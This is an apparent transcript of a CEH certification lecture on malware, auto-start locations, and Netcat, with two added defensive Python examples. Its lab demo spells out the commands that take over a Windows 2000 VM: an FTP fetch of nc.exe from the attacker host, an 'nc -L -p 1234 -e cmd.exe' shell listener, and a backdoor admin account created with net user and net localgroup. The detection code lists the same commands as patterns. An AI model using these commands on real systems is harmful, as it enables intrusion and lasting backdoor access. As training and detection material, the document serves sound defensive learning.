EC Council CEH 312-50 – Malware – Software Goes Undercover Part 3
July 15, 2023

8. Malware Capabilities

Now, the next thing we want to talk about is malware capabilities and some of the things that malware might do. If it’s installed on your system, whether it’s known to you or perhaps not, naturally it can give remote access to someone you don’t even know is doing this. Password sending: whatever you type as your password can be sent to someone else, perhaps by a key logger. So whatever you type on the keyboard could be logged, either by a software device or possibly a hardware device, as we talked about earlier. Possibly even surveillance, in other words, watching what we’re doing. This could be done by the corporation, or it could possibly be done by some nefarious person.

Providing a denial of service attack, in other words, not letting you use your information. Providing an FTP Trojan, which gives the attacker the capability to upload software and use this system perhaps as a pivot to get further into your network. And naturally, it might also kill off any antivirus or other detection software you might have so that it isn’t detected. Many early infectious programs, including the first Internet worm, were written as experiments or pranks. Today, malware is used by black hat hackers and governments alike, primarily to steal sensitive information of personal, financial or business importance. Malware is sometimes used broadly against government or corporate websites to gather guarded information or to disrupt their operation.

In general, however, malware is often used against individuals to gain personal information, such as Social Security numbers, bank or credit card numbers, and so on. Left unguarded, personal and network computers can be at considerable risk from these threats. They are frequently counteracted by various types of firewalls, antivirus and network hardware. Since the rise of widespread broadband Internet access, malicious software has more frequently been designed for profit. The majority of widespread viruses and worms have been designed to take control of users’ computers for black market exploitation.

Infected zombie computers are used to send spam email, to host contraband data such as child pornography, or even to engage in distributed denial of service attacks as a form of extortion. Another form of malware has emerged called spyware. These programs are designed to monitor users’ web browsing, display unsolicited advertisements, or redirect affiliate marketing revenues to the spyware creator. Spyware programs do not spread like viruses. Instead, they are generally installed by exploiting security holes. They can also be packaged together with user installed software, such as peer to peer applications. Some of the best known types of malware, viruses and worms, are known for the manner in which they spread rather than for any specific type of behavior.

The term computer virus is used for a program that has infected some executable software and, when run, causes the virus to spread to other executables. A worm, on the other hand, as we talked about before, is a program that actively transmits itself over a network to infect other computers. These definitions lead to the observation that a virus requires user intervention to spread, whereas a worm spreads automatically. One of the biggest problems we have, and the reason we typically get malware, is that we don’t practice the principle of least privilege, or PoLP. That simply means giving the user only the privileges they need to do their job. Now, it’s really easy for me to sit up here and tell you that, but it’s a whole lot harder to do, because you have to figure out exactly what they need and then give them only those permissions.

But if you’re going to control these pieces of malware, you’re going to have to do something like that. We have a huge number of overprivileged users. Some systems allow all users to modify their internal structures. This was standard operating procedure for early microcomputer and home computer users, as there was no distinction between an administrator or root and a regular user of the system. In some systems, non-administrator users are overly privileged by design, since they are allowed to modify internal structures of the system. In some environments, users are overprivileged because they have been inappropriately granted administrator or equivalent status.

Sometimes we also have overprivileged code. Some systems allow code executed by a user to access all the rights of that user; this too was standard operating procedure for early microcomputer and home computer systems. Malware running as overprivileged code can use this privilege to subvert the system. Almost all currently popular operating systems, and also many scripting applications, allow code too many privileges, usually in the sense that when the user executes the code, the system allows that code all the rights of that user. This makes users vulnerable to malware in the form of email attachments, which may or may not be disguised.

9. Auto Starting Malware

Now naturally, once we get infected with some kind of malware, if we reboot our system, unless there is some mechanism to have it start back up, it’s simply not going to run again. So there are different ways that malware auto starts itself. Modifications to any of these can cause malware to keep running after reboots: for example, system files such as autoexec.bat, system.ini and win.ini, registry keys, and the startup folder. Also be sure to check the registry manually to see where it might be using it. Now today there are some pretty easy ways to find this. There’s a utility called msconfig, and if you execute the msconfig utility, you can typically use it to disable startup programs in system.ini and elsewhere. I went ahead and launched that. So here are the applications that start up when it boots.

Here are the services that start up. Here are the applications that start up from the Registry. You can see here various tools, that kind of thing. And you’ll notice that you can uncheck any of these to see if one is causing a problem. This is the most common way of doing it these days. Now, it should also be noted that there is a tool called HijackThis. It’s a rather old tool, but it does a lot of the same type of stuff that the other tool I was just talking about does. So if you’re running on an older system, perhaps you might use something like this. It’s a tool that scans the Registry and the system files for auto-starting Trojans and spyware, and you can uncheck things, the same type of thing we talked about before.
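The locations just listed can also be audited without a GUI. As an added example, not part of the course material, the Python below parses a constructed `reg export` of the Run/RunOnce keys and a constructed win.ini fragment, then flags entries missing from a clean-build baseline or started from a user-writable folder; the sample data, the baseline and the folder list are assumptions for the demo.

```python
import re

# Constructed `reg export` of the Run/RunOnce keys and a win.ini [windows]
# section, the auto-start locations the lecture names; nc.exe in Temp is new.
REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"svchost"="C:\\Users\\bob\\AppData\\Local\\Temp\\nc.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Updater"="C:\\Users\\bob\\AppData\\Roaming\\upd.vbs"
"""
WIN_INI = "[windows]\nload=\nrun=C:\\Windows\\Temp\\svc.exe\n"

# Baseline snapshot of (key, value name) pairs from a clean build (constructed).
BASELINE = {("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
             "SecurityHealth")}
USER_WRITABLE = ("\\temp\\", "\\appdata\\")  # assumed list of user-writable folders

def parse_reg_export(text):
    """Return (key, name, command) for each value under a Run/RunOnce key."""
    entries, key = [], None
    for line in text.splitlines():
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            key = m.group(1)
        elif key and re.search(r"\\Run(Once)?$", key, re.I):
            m = re.match(r'^"([^"]+)"="(.*)"$', line)
            if m:  # .reg doubles backslashes; undo that for path checks
                entries.append((key, m.group(1), m.group(2).replace("\\\\", "\\")))
    return entries

def parse_win_ini(text):
    """Return (section, name, command) for non-empty load=/run= lines."""
    entries, in_windows = [], False
    for line in text.splitlines():
        if line.startswith("["):
            in_windows = line.strip().lower() == "[windows]"
        elif in_windows and "=" in line:
            k, v = (s.strip() for s in line.split("=", 1))
            if k.lower() in ("load", "run") and v:
                entries.append(("win.ini [windows]", k, v))
    return entries

def suspicious(entries, baseline=BASELINE):
    """Flag entries missing from the baseline or launched from a user-writable dir."""
    return [e for e in entries if (e[0], e[1]) not in baseline
            or any(d in e[2].lower() for d in USER_WRITABLE)]
```

Run `suspicious(parse_reg_export(REG_EXPORT) + parse_win_ini(WIN_INI))` to get the three entries an analyst should uncheck and investigate first.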

10. Tool: Netcat

Now, the next thing I’m going to talk about is what’s often referred to as the Swiss Army Knife of hackers or penetration testers. The tool is called Netcat, and oftentimes you’ll hear it referred to as a listener. Netcat basically opens up a listening connection on a machine, and it will typically even stand in front of an already assigned port. For example, if you have a web service and you configure Netcat to listen on port 80, the next connection to port 80 is consumed by Netcat. So some people use it for other nefarious reasons, so they can jump out in front of something. It actually is a computer networking utility for reading from and writing to network connections using TCP or UDP.

Netcat is designed to be a dependable back end that can be used directly or easily driven by other programs and scripts. At the same time, it’s a feature rich network debugging and investigation tool, since it can produce almost any kind of connection its user could need and has a number of built in capabilities. This is the reason Netcat is often referred to as a Swiss Army Knife for TCP/IP. It has port scanning, file transfer and port listening, and it can also be used as a backdoor. The original version of Netcat was a Unix program. There are many implementations on POSIX systems, including rewrites from scratch like GNU netcat and OpenBSD netcat, a later version which supports IPv6. The OpenBSD version has been ported to FreeBSD and to Windows via Cygwin as well.

Mac OS X users use MacPorts to install a Netcat variant. There’s also a Microsoft Windows version of Netcat available. Known ports for embedded systems include versions for Windows CE (named Netcat 4 WinCE) and for the iPhone. There are versions that run on BusyBox, which includes a lightweight version of Netcat, and on Solaris 11. Cryptcat is a version with integrated encryption capabilities. Let’s take a look real quick at some of the Netcat switches. Now, the -v switch stands for verbose, and -vv for very verbose. -e stands for execute; in other words, whenever we make an attachment to this Netcat listener, it’s going to execute this particular program.

So it could be -e cmd.exe if it’s in a Windows environment, or -e /bin/sh, for example, if it’s in a Unix environment. -d is for stealth mode. -n is specified when Netcat should only accept numeric IP addresses and won’t try to do DNS lookups for anything. Now, the lowercase -l listens for the first connection, and then after it’s disconnected, it stops listening; the uppercase -L will listen and allow the user to reconnect even if the connection was dropped, in other words, keep on listening. So most individuals will use the capital -L unless they’re going to use it for just one time. -p is the port we want to attach to, and -t tells Netcat to handle any telnet negotiation. -u tells it to use UDP instead of TCP, and -o sends its information out to a log file.

11. Demo: NetCat Procedure

Okay, so here’s the next thing I’m going to do. I’m going to give you a demonstration on how some of the netcat features actually work. I’ll first exploit a system, upload netcat to that system, put it into a listening mode, and then attach to it. Now I’m going to use an older version of Windows, Windows 2000. So please don’t think less of me. This course is about concepts. And so this would work just as well if I used Windows 7. But it’s just easier because I already have the exploit available for me to use in Windows 2000. This is what we’re going to do. I will give you a lab to do this on your own. And normally when I’m teaching a class, what I’ll do is I’ll have the students follow along with me, and I’ll tell the students, okay, if you get lost, just don’t raise your hand, because I’m not going to stop.

I’ll come around and help you, because I’ll go fairly quickly and it’s easy to get lost here, but I’ll give you the capability of doing this in a lab. All right? So as a general overview, what I’m going to do is basically exploit the Windows 2000 system. I’m going to supply an FTP IP address, where the IP address is that of an XP VM that I’m going to use, supply a login to that FTP server, and download my netcat executable. So I’m actually going to put it in my toolbox. Just like a carpenter has his set of tools and a plumber has his set of tools, well, a hacker has his set of tools as well. One of the most popular tools is the netcat listener, among others. So he’s going to want to upload that listener, start it in listening mode, and make an attachment to it.

So we’ll go through that process and I’ll put in the various commands, and then I’ll use telnet or netcat to attach to it. And I’ll verify that I’m at that machine by typing in hostname. Okay, so let’s get to it. Okay, here we are in our online lab. And I’m just going to go ahead and open up our XP attacker console. And I’m going to open up our Win2K console. So what I have here is my XP attacker, and I go over to my Windows 2000 machine, and I’m going to need to obtain the IP address of my Windows 2000 machine. So I’m just simply going to go in and do cmd, ipconfig, and it looks like I’m 10.40.1.156. Okay, great. So I’m just going to go ahead and, all right, so I’m going to go into My Computer, drill down to my lab folders, and I’m going to utilize the utility RPC exploit GUI.

I’m just going to go ahead and launch that. And I’ll go ahead and close this. Now I’m going to launch an exploit via the RPC vulnerability that’s in Windows 2000, just to demonstrate this now, guys, because remember, this course is about concepts. I’m going to tell it it’s a Windows 2000. I’m going to give it its IP address, which was 10.40.1.156. And we’ll click Exploit again and we’ll see what might happen. Okay? Boom, we’re into my Windows 2000 machine. Now you might say, okay, well great, you’re in. And let’s see, if I type in whoami, I’m actually in as NT SYSTEM, which is one step above administrator. I own this box. The problem is that this shell is very unstable.

For example, if I were to press Ctrl+C here, it would close this window, and you would actually have to reboot the Windows 2000 machine to get it to connect again. Now if you’re breaking into somebody’s machine and you mess up, it’s probably not going to work. If you call them on the phone and say, you know what, I was breaking into your machine and I really messed up, would you mind rebooting it? That’s probably not going to work. You’re really going to have to get it right the first time, or wait for them to reboot and try at a later time. But we would like to have more of a stable shell. Now the stable shell I’m going to use is

Netcat. So this little utility happens to have a little FTP server built into it. Now the FTP server is listing the IP address of our XP machine. Remember, this right here is our Windows 2000 machine. So if I type in ipconfig right here, it’s 156. This one’s 152. All right? So the first thing I’m going to do is go out and start the FTP server on my XP machine. I’m then going to type in here ftp, space, the IP address of my XP machine, because remember, we’re coming back from the Windows 2000 to the XP so we can upload our toolkit. So ftp 10.40.1.152. All right? And then when I press Enter here, it says, okay, you connected. What is your username? Well, here’s the username, asdf. So I’m going to type in asdf and press Enter.

It says, welcome asdf. Now the next thing I’m going to do is upload the netcat utility. I happen to know where it is on this system. So I’m going to type in get c:\netcat\nc.exe and then press Enter. You notice it here: it says finished sending file. Now again, it seems like it’s hung here. It’s really easy for you to press Ctrl+C, and well, then we have to start all over again. But the proper procedure is to come over here, click on Stop, then over here you’re going to type the command bye, and it releases you back to your system. Now I’m going to type in dir, and there is nc.exe. And sure enough, there is the netcat listener. Now I’m going to start listening so I can connect to it. So I’m going to type in nc -L -p 1234 -e cmd.exe. So let’s discuss what we’re doing here.

I’m starting a netcat listener on my Windows 2000 machine. Remember, it’s like I’m pulled up in a chair in front of the console of the Windows 2000 machine. So I’m going to tell it I want to start a listener on port 1234, and as soon as I make my attachment to that, I want it to execute cmd.exe. Okay, great. I’m going to press Enter on that, and it’s going to appear kind of like it’s hung. That’s normal. Now if I go out here and open up another command prompt, I’ll just go out to the netcat directory, and I’m going to type in nc, then the IP address of the machine that’s running my listener: 10.40.1.156. Was it? I believe that’s right. Yep, space. Now I need to put in the port number, 1234, press Enter, and boom, I’m there.

Now I have a more stable shell, and I can do things like up arrow and backspace and things like that. I’m still in as NT SYSTEM, and I can do a directory listing or whatever else I want to do, copy files up and down. Basically, I own this box. I could type in net user hacker /add, and it adds a user called hacker. I could then say net localgroup administrators hacker. I’ve just added hacker to my local administrators group on that machine. I could use this as a backdoor if I wanted to, or whatever else I was wanting to do. Just to prove to you that this can be done, I’m going to go over to my Win2K machine. I’ll go ahead and log off of it, log on as hacker, and if I am administrator, the first thing that’s going to come up is Configure Your Server. And there you have it.
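The switches described in the Netcat section and the sequence of commands in this demo also tell a defender what to look for on the host. As an added example (not from the course), the Python below runs a few process-creation rules over constructed log records in an assumed `timestamp|user|parent image|image|command line` format: a shell spawned as SYSTEM from a service host (the unstable exploit shell), ftp launched from that shell, an nc listener combined with -e, and the net user / net localgroup additions. The record format, rule names and heuristics are assumptions.

```python
import re
from collections import namedtuple

Event = namedtuple("Event", "ts user parent image cmdline")

# Constructed process-creation records (timestamp|user|parent image|image|command line)
# mirroring the demo: a SYSTEM shell, an ftp fetch of the toolkit, the netcat
# listener, the new local administrator, plus one benign user action.
LOG = """\
10:01:02|NT AUTHORITY\\SYSTEM|C:\\WINNT\\system32\\svchost.exe|C:\\WINNT\\system32\\cmd.exe|cmd.exe
10:01:40|NT AUTHORITY\\SYSTEM|C:\\WINNT\\system32\\cmd.exe|C:\\WINNT\\system32\\ftp.exe|ftp 10.40.1.152
10:02:15|NT AUTHORITY\\SYSTEM|C:\\WINNT\\system32\\cmd.exe|C:\\nc.exe|nc -L -p 1234 -e cmd.exe
10:03:01|NT AUTHORITY\\SYSTEM|C:\\WINNT\\system32\\cmd.exe|C:\\WINNT\\system32\\net.exe|net user hacker /add
10:03:09|NT AUTHORITY\\SYSTEM|C:\\WINNT\\system32\\cmd.exe|C:\\WINNT\\system32\\net.exe|net localgroup administrators hacker /add
10:05:00|WIN2K\\alice|C:\\WINNT\\explorer.exe|C:\\WINNT\\system32\\notepad.exe|notepad.exe
"""

SERVICE_HOSTS = ("svchost.exe", "dllhost.exe", "rpcss.exe")  # assumed RPC/DCOM hosts
SHELLS = ("cmd.exe", "command.com")

def parse(text):
    return [Event(*line.split("|", 4)) for line in text.splitlines() if line]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def rules(ev):
    """Yield a short tag for every heuristic the event triggers."""
    img, cmd, parent = basename(ev.image), ev.cmdline, basename(ev.parent)
    if img in SHELLS and ev.user.upper().endswith("SYSTEM") and parent in SERVICE_HOSTS:
        yield "system_shell_from_service"        # shell handed out by a service exploit
    if (re.search(r"^(nc|ncat|netcat)(\.exe)?\s", cmd, re.I)
            and re.search(r"\s-[lL]\b", cmd) and re.search(r"\s-e\s", cmd)):
        yield "netcat_listener_with_exec"        # nc -L -p <port> -e cmd.exe
    if img in ("net.exe", "net1.exe"):
        if re.search(r"\buser\s+\S+(\s+\S+)?\s+/add\b", cmd, re.I):
            yield "local_account_created"
        if re.search(r"\blocalgroup\s+administrators\s+\S+\s+/add\b", cmd, re.I):
            yield "local_admin_added"
    if img == "ftp.exe" and parent in SHELLS and ev.user.upper().endswith("SYSTEM"):
        yield "ftp_from_system_shell"            # toolkit being pulled onto the host

def detect(text):
    """Return (timestamp, tag) pairs for every rule hit, in log order."""
    return [(ev.ts, tag) for ev in parse(text) for tag in rules(ev)]
```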
